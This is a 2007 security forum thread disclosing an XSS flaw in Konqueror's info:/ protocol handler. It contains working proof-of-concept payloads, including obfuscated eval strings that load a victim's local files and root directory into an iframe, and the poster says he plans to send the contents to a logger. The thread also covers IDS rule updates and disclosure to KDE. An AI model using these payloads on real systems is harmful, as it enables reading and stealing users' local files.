Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 08:19AM

an XSS exists in KDE 3.5.3 running Konqueror 3.5.3
under the info:/ protocol, the proof of concept
is as follows:

info:/<img src='x' onerror='alert("xss")'>/code>

this could allow for the reading of local files
through use of iframes and innerHTML
through the file:// protocol, this can be
exploited remotely through a malicious link
or javascript on a site.

http://null-byt3.co.uk

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 10:12AM

check their connect with their smb protocol..
the only problem with this xss is that it is cut off
after /'s..

info:/<iframe src=file:%></

this does mean that you can find other
users on their intranet with javascript.

i.e you would find files in the iframe with:
info:/<iframe src=file:validuser></

but not if the user didn't exist:
info:/<iframe src=file:invalideuser></

EDIT:
got around the problem of it cutting off anything after the /
with eval
now looks like this:

info:/<img src='x' onerror='eval(String.fromCharCode(100,111,99,117,109,101,110,116,
46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,
105,102,114,34,41,46,115,114,99,61,39,102,105,108,101,58,118,97,
108,105,100,117,115,101,114,47,67,47,39))'><iframe src=file:xxx id=ifr>/code>

the ascii equates to:
document.getElementById("ifr").src='file:validuser/C/'

this will show the C drive of "validuser"
the only problem now is that innerHTML doesn't work...

edit 2:
decided to use location.hash with substr, much easier

info:/<img src='x' onerror='eval(location.hash.substr(1,100))'><iframe src=file:megs id=ifr>/code>aa#document.getElementById('ifr').src="file:///root/"

will show you root's directory..

now I just need to figure out a way of passing this information on to
a logger..

http://null-byt3.co.uk



Edited 4 time(s). Last edit at 07/31/2007 11:10AM by faz3d.

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: July 31, 2007 12:53PM

Nice work, I never heard about the info:/

It's really amazing how much resource identifers there are in browsers and registered by programs. When you actually only need as much as the number as fingers on your hand.

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: July 31, 2007 01:27PM

That's a very nice find! It wouldn't hit that many users though but still has potential.

You tried XHRing arbitrary files already?

I also just upgraded the PHIPIDS rules - PoC:
http://demo.php-ids.org/?test=info:/%3Cimg%20src='x'%20onerror='alert(%22xss%22)'%3E/code%3E

Greetings,
.mario

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 06:57PM

I thought of it but at the time I hadn't
thought of using location.hash so It would
have been to much ASCII/I couldn't use /'s before
that, I will include a remote js file to do it
if it works...
EDIT:
I came up with the idea of using AJAX as soon as
I found the XSS as you can see from my site:
http://null-byt3.co.uk/memberxarea/viewtopic.php?p=223
EDIT 2:
I have also been working on a script to grab
local/remote files before finding the XSS so
I will put it to use and tell you what happens..

http://null-byt3.co.uk



Edited 2 time(s). Last edit at 07/31/2007 07:11PM by faz3d.

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: timb
Date: August 02, 2007 09:54AM

This and a number of other XSS etc have already been reported to kde.org as part of a research paper I wrote called Kreating havoK. IO slaves are interesting, I would suggest people go play with them. The first result of my fuzzing them was http://trolltech.com/company/newsroom/announcements/press.2007-07-27.7503755960 but expect more issues to come soon. We reported on the 11th July 2007.



Edited 1 time(s). Last edit at 08/02/2007 09:55AM by timb.

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: August 02, 2007 10:27AM

@timb

sounds interesting, any ideas of sharing the paper after it?

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: timb
Date: August 02, 2007 10:42AM

The paper will be published when we've finished chatting with the KDE folk. I'll probably make the fuzzer available too, since IO slaves vary on different installs.. My default Debian install has around 60 to play with, but there are many more. We found multiple XSS points (both in URL and reflected from remote services), directory traversal, a format string vulnerability amongst other things all in a short space of time but I'm willing to bet there is more to find. As I say, go play. It's as much fun as Firefox :).

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: August 02, 2007 11:35AM

I'm looking forward to it, I don't have that much time to toy with it myself. It would be a great learning curve to read the paper since this stuff isn't very well documented or written about, so do drop a note when it's time please ^^

Thanks.

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: faz3d
Date: August 03, 2007 12:47PM

would like to read that myself..
tell me when its done!

http://null-byt3.co.uk

Options: ReplyQuote
Re: KDE (konqueror) XSS
Posted by: timb
Date: November 01, 2009 03:23PM

Finally on their way ... http://www.ocert.org/advisories/ocert-2009-015.html ... expect our advisories next week!

Options: ReplyQuote


Sorry, only registered users may post in this forum.